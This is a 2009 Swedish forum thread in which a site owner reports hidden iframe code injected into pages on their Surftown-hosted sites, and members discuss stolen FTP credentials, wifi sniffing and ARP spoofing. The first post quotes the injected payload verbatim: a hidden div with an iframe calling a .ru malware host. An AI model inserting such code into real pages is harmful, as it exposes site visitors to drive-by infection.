FAQ |
Kalender |
2009-09-28, 22:01 | #1 | ||
|
|||
Medlem
|
Tjenare!
Något riktigt otäckt har hänt mig. För ett par dagar sedan märkte jag denna besynnerliga, och förmodligen otäcka, kod på ett par av mina webbplatser som ligger på surftown. Kod:
<div style="display:none">fnlfxwewpykjqeqkklbdommqprscveo</div> <div style="display:none">thtmytmyzpadfwxtflgzbwxsaymwgjo<iframe width=360 height=706 src="http://hochesh-li.ru:8080/index.php" ></iframe></div> Jag tycker det är något konstigt att den bara skriver till mina sajter som ligger på surftown, har använt samma ftp-klient till andra hostar och där har ingen ryss varit framme. Kan det vara så illa att surftown har problem med trojanprogram? Eller ligger problemet på min dator? Någon som har något bra tips på ett anti-spyware program som kan hjälpa mig ur knipan? mvh Vic |
||
Svara med citat |
2009-09-28, 22:20 | #2 | ||
|
|||
Administratör
|
Problemet kan både ligga på din sajt (de kommer in via ett script, kanske ett du skapat eller något de lyckats ladda upp på ett eller annat sätt) eller på din dator (spyware som kollar dina ftp-uppgifter, möjligtvis att de filtrerar på t ex surftown osv då de vet att det är ett webbhotell).
Har du någon annan dator du kan använda, samt byta lösenord till ftp-servern och du därefter kan göra dina ändringar ifred så är det förmodligen bara spyware på din dator. I annat fall kan det mycket väl vara båda två. I tråden http://www.wn.se/t1038077-15-2.html ligger lite tips från praktiskt erfarenhet i sista inlägget. Får du tag i något antivirus som lyckas tala om vad programvaran heter kan du nog hitta bra instruktioner för att bli av med det genom Google annars. |
||
Svara med citat |
2009-09-30, 12:49 | #3 | ||
|
|||
Nykomling
|
På mitt förra jobb (som sysadmin på ett webhotell) såg jag massor av kunder varje vecka som drabbades av detta, och jag antog att det berodde på infektioner i deras datorer.
Men så hände det mig, trots att jag är ordentligt säkerhetsmedveten och inte använder windows till något utvecklingsrelaterat. En av mina privata sidor fick i sig lite iframes (ftp'ade från Kina), och den enda förklaringen jag kan tänka mig var att lösenordet snappades upp när jag nån dag innan satt uppkopplad på ett SJ-tåg över deras okrypterade wifi-tjänst (och förklaringen till det var att jag hade druckit en massa öl. Lång resa). Det är knappast någon som satt och avsiktligt dumpade trafik på just det tåget för att skicka datan vidare till Kinesiska bots, men det finns säkert någon form av spyware som även klarar av att scanna okrypterad trådlös trafik. Nån bättre förklaring har jag inte kommit på. Men hursomhelst, tror fortfarande att 99% beror på någon form av spyware i klientdatorn (fick förresten också det bekräftat av flera kunder som rensat ut spyware efter incidenten. Tyvärr kommer jag inte ihåg om de använt nått specifikt program för det som kan rekommenderas). |
||
Svara med citat |
2009-10-03, 20:20 | #4 | |||
|
||||
Mycket flitig postare
|
Några andra med samma problem:
Citat:
Malware warnings: http://www.malwareurl.com/listing.php?domain=bionaft.ru |
|||
Svara med citat |
2009-10-05, 07:01 | #5 | |||
|
||||
Bara ett inlägg till!
|
Citat:
Det här har även drabbat Mac-användare och kunder som vid en (uppdaterad) virussökning inte hittat några virus alls. Därför är det troligt att det finns virus som även sniffar på nätverket för att snappa upp FTP-uppgifter. Det är lätt att läsa av uppgifter som skickas från andra datorer på det interna nätverket, och jag kan även intyga att det är enkelt att göra det på SJ:s tåg... |
|||
Svara med citat |
2009-10-05, 10:37 | #6 | |||
|
||||
Klarade millennium-buggen
|
Fast sniffa behövs då "man in the middle" attack, då trafiken inte passerar ens dator annars, om inte "SJ" använder hubbar
Väldigt spännande och "high tech" bot som sniffar wifi/bt nät och skickar iväg intressant info, låter inte som en omöjlig och otrolig sak. Zombie datorer som i sin tur ligger och sniffar andras datorer Haft problem med iframe också på en sida jag hade, ändrade allt men kom tillbaka alla fall. |
|||
Svara med citat |
2009-10-05, 11:41 | #7 | ||
|
|||
Har WN som tidsfördriv
|
|||
Svara med citat |
2009-10-05, 12:12 | #8 | |||
|
||||
Bara ett inlägg till!
|
Det är lätt att ARP-spoofa nätet, dvs ropa ut att "hej, jag är en switch och trafik till dessa IP-adresser ska gå via mig". Detta kan leda om trafiken även i ett switchat nät så att den går via ens egen dator. Det behöver alltså inte alls vara i den trådlösa kommunikationen.
|
|||
Svara med citat |
2009-10-06, 06:39 | #9 | ||
|
|||
Medlem
|
Här finns en intressant artikel om fenomenet med iframe attacker.
http://rzaman.com/remove-iframe-hack/ Jag har installerat gratisprogrammet Keepass för att kryptera mina lösenord och för att stoppa keyloggers för de ger en skyddad inloggning via Auto-typing. Jag har slutat att ftp:a dagligen från Windows utan skall använda One.coms ftp-program via webben istället eller så köra ftp från Mandriva Linux som jag kan boota till. Linux borde vara säkrare att använda. |
||
Svara med citat |
Svara |
|
|